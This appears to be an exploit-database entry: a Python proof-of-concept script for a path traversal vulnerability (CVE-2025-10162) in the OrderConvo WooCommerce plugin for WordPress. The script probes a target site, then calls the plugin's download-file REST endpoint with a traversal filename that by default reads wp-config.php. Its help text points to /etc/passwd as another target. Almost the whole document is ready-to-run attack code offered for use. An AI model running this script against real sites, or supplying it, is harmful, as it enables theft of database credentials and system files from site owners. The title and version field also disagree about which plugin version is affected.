WordPress OrderConvo 14 – Path Traversal

# Exploit Title: WordPress OrderConvo 14 - Path Traversal
# Date: 05-31-2026
# Exploit Author: Diamorphine
# Vendor Homepage: https://www.najeebmedia.com/ 
# Software Link: https://wordpress.org/plugins/admin-and-client-message-after-order-for-woocommerce/
# Version: 13.5
# Tested on: Debian
# CVE : CVE-2025-10162

import httpx
import asyncio
import argparse
from urllib.parse import urljoin
import sys


async def main(base_url, file):
	async with httpx.AsyncClient(verify=False) as client:
		try:
			print('[*] Checking connection to target')
			req = await client.get(url=base_url)
			if req.status_code == 200:
				print('[+] The target is alive, exploitingn')
			else:
				print(f'[-] Unable to connect to the target. Code: {req.status_code}')
				sys.exit()
		except:
			print(f'[-] Problem with connection to the target.')
			sys.exit()		
	
		exp_url = urljoin(base_url, f'wp-json/wooconvo/v1/download-file?order_id=1&filename={file}')
		r = await client.get(url=exp_url)
		if len(r.text) != 0:
			print(r.text)
		else:
			print("[*] Unable to read file")

parser = argparse.ArgumentParser(description="Exploit for CVE-2025-10162")

parser.add_argument("-u", "--url", required=True, help="Target URL, e.g. https://test.local")
parser.add_argument("-f", "--filename", default="../../../../wp-config.php", help="Path to the file to read. Note: You must use deep path traversal sequences (e.g., ../../../../../etc/passwd) to break out of the web root and access sensitive system or WordPress files. (Default: ../../../../wp-config.php)")

args = parser.parse_args()

if __name__ == '__main__':
	asyncio.run(main(args.url, args.filename))